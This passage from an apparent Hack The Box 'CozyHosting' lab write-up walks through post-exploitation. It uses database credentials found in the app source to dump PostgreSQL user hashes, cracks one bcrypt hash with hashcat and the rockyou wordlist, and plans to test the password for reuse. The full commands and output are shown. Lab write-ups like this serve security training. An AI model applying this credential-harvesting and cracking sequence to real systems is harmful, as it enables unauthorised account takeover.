PostgreSQL
The presence of PostgreSQL instance is confirmed from multiple sources including process and network enumeration PEAS was also able to pick it up
while enumerating the source code of the web application, one of the source files contained the configurations, which includes a db credential; postgres:Vg&nvzAQ7XxR
app@cozyhosting:/app$ psql 'postgresql://postgres:Vg&nvzAQ7XxR@localhost:5432/cozyhosting'Authenticated
DBs
\list
List of databases
Name | Owner | Encoding | Collate | Ctype | Access privileges
-------------+----------+----------+-------------+-------------+-----------------------
cozyhosting | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 |
postgres | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 |
template0 | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 | =c/postgres +
| | | | | postgres=CTc/postgres
template1 | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 | =c/postgres +
| | | | | postgres=CTc/postgres
(4 rows)
\c cozyhosting
You are now connected to database "cozyhosting" as user "postgres".I will check the cozyhosting DB
Tables
\d
List of relations
Schema | Name | Type | Owner
--------+--------------+----------+----------
public | hosts | table | postgres
public | hosts_id_seq | sequence | postgres
public | users | table | postgres
(3 rows)There are 3 tables within the cozyhosting DB
cozyhosting.hosts
SELECT * FROM "public"."hosts";
id | username | hostname
----+-----------+--------------------
1 | kanderson | suspicious mcnulty
5 | kanderson | boring mahavira
6 | kanderson | stoic varahamihira
7 | kanderson | awesome lalande
(4 rows)Arbitrary data
cozyhosting.hosts_id_seq
SELECT * FROM "public"."hosts_id_seq";
last_value | log_cnt | is_called
------------+---------+-----------
7 | 26 | t
(1 row)cozyhosting.users
SELECT * FROM "public"."users";
name | password | role
-----------+--------------------------------------------------------------+-------
kanderson | $2a$10$E/Vcd9ecflmPudWeLSEIv.cvK6QjxjWlWXpij1NVNV3Mm6eH58zim | User
admin | $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm | Admin
(2 rows)The cozyhosting.users table contains user credentials
Password Cracking
┌──(kali㉿kali)-[~/…/htb/labs/cozyhosting/cozycloud]
└─$ hashcat -a 0 -m 3200 hashes /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
minimum password length supported by kernel: 0
maximum password length supported by kernel: 72
hashes: 2 digests; 2 unique digests, 2 unique salts
bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
rules: 1
dictionary cache hit:
* filename..: /usr/share/wordlists/rockyou.txt
* passwords.: 14344385
* bytes.....: 139921507
* keyspace..: 14344385
$2a$10$spkydhlb0foat7n3x72wtus0yr8uqqbnnpipjub2mzib3h9kvo8dm:manchesterunited
[s]tatus [p]ause [b]ypass [c]heckpoint [f]inish [q]uit => q
session..........: hashcat
status...........: Quit
hash.mode........: 3200 (bcrypt $2*$, Blowfish (Unix))
hash.target......: hashes
time.started.....: Sun Sep 10 00:14:55 2023 (56 secs)
time.estimated...: Mon Sep 11 12:51:29 2023 (1 day, 12 hours)
kernel.feature...: Pure Kernel
guess.base.......: File (/usr/share/wordlists/rockyou.txt)
guess.queue......: 1/1 (100.00%)
speed.#1.........: 109 H/s (4.73ms) @ Accel:6 Loops:16 Thr:1 Vec:1
recovered........: 1/2 (50.00%) Digests (total), 1/2 (50.00%) Digests (new), 1/2 (50.00%) Salts
progress.........: 6480/28688770 (0.02%)
rejected.........: 0/6480 (0.00%)
restore.point....: 3240/14344385 (0.02%)
restore.sub.#1...: Salt:0 Amplifier:0-1 Iteration:336-352
candidate.engine.: Device Generator
candidates.#1....: hotrod -> blake
hardware.mon.#1..: Util: 82%
started: Sun Sep 10 00:14:52 2023
stopped: Sun Sep 10 00:15:52 2023Hashcat cracked one of the hashes; manchesterunited
I will test password reuse on the josh user